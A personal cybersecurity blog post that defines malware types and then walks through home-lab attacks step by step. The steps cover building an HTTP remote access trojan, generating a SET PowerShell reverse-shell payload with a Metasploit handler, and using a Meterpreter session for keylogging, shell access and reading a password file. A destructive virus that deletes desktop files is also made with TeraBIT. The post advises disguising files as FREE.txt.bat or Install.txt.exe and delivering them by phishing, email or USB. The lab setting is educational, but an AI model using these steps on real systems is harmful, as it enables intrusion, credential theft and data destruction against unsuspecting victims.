My Cybersecurity Journal: Remote Access Trojan (RAT), Social Engineering Toolkit (SET) and Virus Attack

The following are the most common types of malicious software (malware):

* Computer virus: Malicious software that infects a host file or system area to produce an undesirable outcome such as erasing data, stealing information, or corrupting the integrity of the system. In numerous cases, these viruses multiply again to form new generations of themselves.

* Worm: A virus that replicates itself over the network, infecting numerous vulnerable systems. In most cases, a worm executes malicious instructions on a remote system without user interaction.
Mailer or mass-mailer worm: A type of worm that sends itself in an email message. Examples of mass-mailer worms are Loveletter.A@mm and W32/SKA.A@m (a.k.a. the Happy99 worm), which sends a copy of itself every time the user sends a new message.

* Logic bomb: A type of malicious code that is injected into a legitimate application. An attacker can program a logic bomb to delete itself from the disk after it performs the malicious tasks on the system. Examples of these malicious tasks include deleting or corrupting files or databases
and executing a specific instruction after certain system conditions are met.

* Trojan horse: A type of malware that executes instructions to delete files, steal data, or otherwise compromise the integrity of the underlying operating system. Trojan horses typically use a form of social engineering to fool victims into installing such software on their computers or mobile devices. Trojans can also act as back doors.

* Back door: A piece of malware or a configuration change that allows an attacker to control the victim’s system remotely. For example, a back door can open a network port on the affected system so that the attacker can connect to and control the system.

* Exploit: A malicious program designed to exploit, or take advantage of, a single vulnerability or set of vulnerabilities.

* Downloader: A piece of malware that downloads and installs other malicious content from the Internet to perform additional exploitation on an affected system.

* Spammer: Malware that sends spam, or unsolicited messages sent via email, instant messaging, newsgroups, or any other kind of computer or mobile device communications. Spammers send these unsolicited messages with the primary goal of fooling users into clicking malicious links, replying to emails or other messages with sensitive information, or performing different types of scams. The attacker’s main objective is to make money.

* Key logger: A piece of malware that captures the user’s keystrokes on a compromised computer or mobile device. A key logger collects sensitive information such as passwords, personal ID numbers (PINs), personally identifiable information (PII), credit card numbers, and more.

* Rootkit: A set of tools used by an attacker to elevate his or her privilege to obtain root-level access in order to completely take control of the affected system.

* Ransomware: A type of malware that compromises a system and then demands that the victim pay a ransom to the attacker in order for the malicious activity to cease or for the malware to be removed from the affected system. Two examples of ransomware are Crypto Locker and CryptoWall; they both encrypt the victim’s data and demand that the user pay a ransom in order for the data to be decrypted and accessible again.

HTTP Remote Access Trojan (RAT)

Unzip the downloaded file > double-click on the httprat application > deselect send notification with ip address to mail > click Create.

Click OK

Rename the httpserver file to make it more clickable and send it to the victim via email, USB or other social engineering means.

In this case I just double-click the file on my Windows 7 machine.

If you open Task Manager, you'll notice the httpserver.exe process is running in the background.

I HTTP to the Windows 7 machine (192.168.1.130) from my Windows 10 machine (192.168.1.100).

Once you've connected via HTTP, you can browse machine using the GUI menu.

You can browse files and view its contents. In this case I've created a text file and put some usernames and passwords on it.

You can also system info and users created.

Social Engineering Toolset (SET)

Launch the Social Engineer Toolkit in Kali Linux by typing setoolkit in a terminal > type y > type 1

root@kali:~# setoolkit

[-] New set.config.py file generated on: 2018-10-30 02:50:14.347100

[-] Verifying configuration update...

[*] Update verified, config timestamp is: 2018-10-30 02:50:14.347100

[*] SET is using the new config, no need to restart

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.

* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.

* Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.

Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.

Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it).

Also note that by using this software, if you ever see the creator of SET in a bar, you should (optional) give him a hug and should (optional) buy him a beer (or bourbon - hopefully bourbon). Author has the option to refuse the hug (most likely will never happen) or the beer or bourbon (also most likely will never happen). Also by using this tool (these are all optional of course!), you should try to make this industry better, try to stay positive, try to help others, try to learn from one another, try stay out of drama, try offer free hugs when possible (and make sure recipient agrees to mutual hug), and try to do everything you can to be awesome.

The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.

Do you agree to the terms of service [y/n]: y

[---] The Social-Engineer Toolkit (SET) [---]

[---] Created by: David Kennedy (ReL1K) [---]

Version: 7.7.9

Codename: 'Blackout'

[---] Follow us on Twitter: @TrustedSec [---]

[---] Follow me on Twitter: @HackingDave [---]

[---] Homepage: https://www.trustedsec.com [---]

Welcome to the Social-Engineer Toolkit (SET).

The one stop shop for all of your SE needs.

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

It's easy to update using the PenTesters Framework! (PTF)

Visit https://github.com/trustedsec/ptf to update all your tools!

Select from the menu:

1) Social-Engineering Attacks

2) Penetration Testing (Fast-Track)

3) Third Party Modules

4) Update the Social-Engineer Toolkit

5) Update SET configuration

6) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set> 1

https://www.trustedsec.com

[---] The Social-Engineer Toolkit (SET) [---]

[---] Created by: David Kennedy (ReL1K) [---]

Version: 7.7.9

Codename: 'Blackout'

[---] Follow us on Twitter: @TrustedSec [---]

[---] Follow me on Twitter: @HackingDave [---]

[---] Homepage: https://www.trustedsec.com [---]

Welcome to the Social-Engineer Toolkit (SET).

The one stop shop for all of your SE needs.

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

It's easy to update using the PenTesters Framework! (PTF)

Visit https://github.com/trustedsec/ptf to update all your tools!

Select from the menu:

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors

3) Infectious Media Generator

4) Create a Payload and Listener

5) Mass Mailer Attack

6) Arduino-Based Attack Vector

7) Wireless Access Point Attack Vector

8) QRCode Generator Attack Vector

9) Powershell Attack Vectors

10) SMS Spoofing Attack Vector

11) Third Party Modules

99) Return back to the main menu.

set> 9

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.

1) Powershell Alphanumeric Shellcode Injector

2) Powershell Reverse Shell

3) Powershell Bind Shell

4) Powershell Dump SAM Database

99) Return to Main Menu

set:powershell>1

Enter the IPAddress or DNS name for the reverse host: 192.168.1.110 // KALI LINUX

set:powershell> Enter the port for the reverse [443]:

[*] Prepping the payload for delivery and injecting alphanumeric shellcode...

[*] Generating x86-based powershell injection code...

[*] Reverse_HTTPS takes a few seconds to calculate..One moment..

No encoder or badchars specified, outputting raw payload

Payload size: 381 bytes

Final size of c file: 1626 bytes

[*] Finished generating powershell injection bypass.

[*] Encoded to bypass execution restriction policy...

[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/

set> Do you want to start the listener now [yes/no]: : yes

[-] Failed to connect to the database: could not connect to server: Connection refused

Is the server running on host "localhost" (::1) and accepting

TCP/IP connections on port 5432?

could not connect to server: Connection refused

Is the server running on host "localhost" (127.0.0.1) and accepting

TCP/IP connections on port 5432?

# cowsay++

____________

< metasploit >

------------

\ ,__,

\ (oo)____

(__) )\

||--|| *

=[ metasploit v4.17.11-dev ]

+ -- --=[ 1807 exploits - 1028 auxiliary - 313 post ]

+ -- --=[ 539 payloads - 42 encoders - 10 nops ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives.

resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler

resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_https

payload => windows/meterpreter/reverse_https

resource (/root/.set/reports/powershell/powershell.rc)> set LPORT 443

LPORT => 443

resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0

LHOST => 0.0.0.0

resource (/root/.set/reports/powershell/powershell.rc)> set ExitOnSession false

ExitOnSession => false

resource (/root/.set/reports/powershell/powershell.rc)> exploit -j

[*] Exploit running as background job 0.

msf exploit(multi/handler) >

[*] Started HTTPS reverse handler on https://0.0.0.0:443

msf exploit(multi/handler) >

The .set is a hidden folder, so to unhide it, go to Kali Linux (GUI) > click Toggle view > tick Show hidden files

Rename x86_powershell_injection.txt to make it attractive such as FREE.txt.bat. Do a right-click > Rename.

Transfer the .bat file to Windows 7 machine using various Social Engineering attacks (i.e. email, USB, phishing, etc.). Open the batch file (.bat) by double-clicking on the file. Notice it shows up as a text (.txt) file.

A command prompt (with bunch of text) will appear and then quickly disappear automatically.

Notice a session was established and detected in Kali SET.

msf exploit(multi/handler) >

[*] https://0.0.0.0:443 handling request from 192.168.1.130; (UUID: etbgjsne) Staging x86 payload (180825 bytes) ...

[*] Meterpreter session 1 opened (192.168.1.110:443 -> 192.168.1.130:52426) at 2018-10-30 03:24:30 -0400

msf exploit(multi/handler) > show sessions

Active sessions

===============

Id Name Type Information Connection

-- ---- ---- ----------- ----------

1 meterpreter x86/windows WIN-7V0EVV4BKQJ\Administrator @ WIN-7V0EVV4BKQJ 192.168.1.110:443 -> 192.168.1.130:52458 (192.168.1.130)

msf exploit(multi/handler) > sessions 1

[*] Starting interaction with 1...

meterpreter > help

Core Commands

=============

Command Description

------- -----------

? Help menu

background Backgrounds the current session

bgkill Kills a background meterpreter script

bglist Lists running background scripts

bgrun Executes a meterpreter script as a background thread

channel Displays information or control active channels

close Closes a channel

detach Detach the meterpreter session (for http/https)

disable_unicode_encoding Disables encoding of unicode strings

enable_unicode_encoding Enables encoding of unicode strings

exit Terminate the meterpreter session

get_timeouts Get the current session timeout values

guid Get the session GUID

help Help menu

info Displays information about a Post module

irb Drop into irb scripting mode

load Load one or more meterpreter extensions

machine_id Get the MSF ID of the machine attached to the session

migrate Migrate the server to another process

pivot Manage pivot listeners

quit Terminate the meterpreter session

read Reads data from a channel

resource Run the commands stored in a file

run Executes a meterpreter script or Post module

sessions Quickly switch to another session

set_timeouts Set the current session timeout values

sleep Force Meterpreter to go quiet, then re-establish session.

ssl_verify Modify the SSL certificate verification setting

transport Change the current transport mechanism

use Deprecated alias for "load"

uuid Get the UUID for the current session

write Writes data to a channel

Stdapi: File system Commands

============================

Command Description

------- -----------

cat Read the contents of a file to the screen

cd Change directory

checksum Retrieve the checksum of a file

cp Copy source to destination

dir List files (alias for ls)

download Download a file or directory

edit Edit a file

getlwd Print local working directory

getwd Print working directory

lcd Change local working directory

lls List local files

lpwd Print local working directory

ls List files

mkdir Make directory

mv Move source to destination

pwd Print working directory

rm Delete the specified file

rmdir Remove directory

search Search for files

show_mount List all mount points/logical drives

upload Upload a file or directory

Stdapi: Networking Commands

===========================

Command Description

------- -----------

arp Display the host ARP cache

getproxy Display the current proxy configuration

ifconfig Display interfaces

ipconfig Display interfaces

netstat Display the network connections

portfwd Forward a local port to a remote service

resolve Resolve a set of host names on the target

route View and modify the routing table

Stdapi: System Commands

=======================

Command Description

------- -----------

clearev Clear the event log

drop_token Relinquishes any active impersonation token.

execute Execute a command

getenv Get one or more environment variable values

getpid Get the current process identifier

getprivs Attempt to enable all privileges available to the current process

getsid Get the SID of the user that the server is running as

getuid Get the user that the server is running as

kill Terminate a process

localtime Displays the target system's local date and time

pgrep Filter processes by name

pkill Terminate processes by name

ps List running processes

reboot Reboots the remote computer

reg Modify and interact with the remote registry

rev2self Calls RevertToSelf() on the remote machine

shell Drop into a system command shell

shutdown Shuts down the remote computer

steal_token Attempts to steal an impersonation token from the target process

suspend Suspends or resumes a list of processes

sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands

===============================

Command Description

------- -----------

enumdesktops List all accessible desktops and window stations

getdesktop Get the current meterpreter desktop

idletime Returns the number of seconds the remote user has been idle

keyscan_dump Dump the keystroke buffer

keyscan_start Start capturing keystrokes

keyscan_stop Stop capturing keystrokes

screenshot Grab a screenshot of the interactive desktop

setdesktop Change the meterpreters current desktop

uictl Control some of the user interface components

Stdapi: Webcam Commands

=======================

Command Description

------- -----------

record_mic Record audio from the default microphone for X seconds

webcam_chat Start a video chat

webcam_list List webcams

webcam_snap Take a snapshot from the specified webcam

webcam_stream Play a video stream from the specified webcam

Stdapi: Audio Output Commands

=============================

Command Description

------- -----------

play play an audio file on target system, nothing written on disk

Priv: Elevate Commands

======================

Command Description

------- -----------

getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

================================

Command Description

------- -----------

hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands

========================

Command Description

------- -----------

timestomp Manipulate file MACE attributes

meterpreter > sysinfo

Computer : WIN-7V0EVV4BKQJ

OS : Windows 7 (Build 7601, Service Pack 1).

Architecture : x86

System Language : en_US

Domain : WORKGROUP

Logged On Users : 1

Meterpreter : x86/windows

meterpreter > arp

ARP cache

=========

IP address MAC address Interface

---------- ----------- ---------

192.168.1.1 00:78:88:4b:bf:65 11

192.168.1.100 c0:3f:d5:6b:62:41 11

192.168.1.110 00:0c:29:6a:10:05 11

192.168.1.255 ff:ff:ff:ff:ff:ff 11

224.0.0.22 00:00:00:00:00:00 1

224.0.0.22 01:00:5e:00:00:16 11

224.0.0.251 01:00:5e:00:00:fb 11

224.0.0.252 01:00:5e:00:00:fc 11

239.255.255.250 00:00:00:00:00:00 1

239.255.255.250 01:00:5e:7f:ff:fa 11

meterpreter > ipconfig

Interface 1

============

Name : Software Loopback Interface 1

Hardware MAC : 00:00:00:00:00:00

MTU : 4294967295

IPv4 Address : 127.0.0.1

IPv4 Netmask : 255.0.0.0

IPv6 Address : ::1

IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Interface 11

============

Name : Intel(R) PRO/1000 MT Network Connection

Hardware MAC : 00:0c:29:6b:99:7a

MTU : 1500

IPv4 Address : 192.168.1.130

IPv4 Netmask : 255.255.255.0

IPv6 Address : fe80::104a:e373:9974:3524

IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 12

============

Name : Microsoft ISATAP Adapter

Hardware MAC : 00:00:00:00:00:00

MTU : 1280

IPv6 Address : fe80::5efe:c0a8:182

IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

You can perform a key scan or key logger. In this case I went to www.bankofamerica and login (dummy account).

meterpreter > keyscan_start

Starting the keystroke sniffer ...

meterpreter > keyscan_dump

Dumping captured keystrokes...

bankofamerica.com<CR>

john<Tab>abcxyz123

You can issue shell commands and perform reconnaissance on the infected machine.

meterpreter > shell

Process 2676 created.

Channel 1 created.

Microsoft Windows [Version 6.1.7601]

C:\Users\Administrator\Downloads\TROJAN\FREE.txt>cd C:\Users\Administrator\Documents

cd C:\Users\Administrator\Documents

C:\Users\Administrator\Documents>dir

dir

Volume in drive C has no label.

Volume Serial Number is 8A57-80AD

Directory of C:\Users\Administrator\Documents

10/30/2018 02:45 PM <DIR> .

10/30/2018 02:45 PM <DIR> ..

10/17/2018 05:32 PM 44 PASSWORDS.txt

10/30/2018 02:45 PM <DIR> WIN7

1 File(s) 44 bytes

3 Dir(s) 55,791,808,512 bytes free

C:\Users\Administrator\Documents>more PASSWORDS.txt

more PASSWORDS.txt

cisco cisco123

admin cisco

admin admin

TeraBit Virus Maker

Download (extract) and install TeraBIT Virus Maker. Click on the Application to launch it.

I created a virus that would maliciously perform the following:

Delete All Files in Desktop
Funny Start Button
Hide Desktop Icons

I also created a custom Error Message (This PC is hackced!) and changed the file icon to appear as MS Word document with a filename of Install.txt.exe.

Click Create Virus and choose a location to save the virus file.

Do a right-click > Properties and notice it shows as a .txt file but actually it's an .exe file

Transfer the virus file using various Social Engineering attack (hyperlink, phishing, etc.). Double-click on the virus file (Install.txt). Notice it launched the custom error message.

It automatically deleted my Desktop files (PASWORDS, FILE-1 and FILE-2) and also deleted the PuTTY Desktop icon.

My Cybersecurity Journal

Friday, May 10, 2019

Remote Access Trojan (RAT), Social Engineering Toolkit (SET) and Virus Attack

No comments:

Post a Comment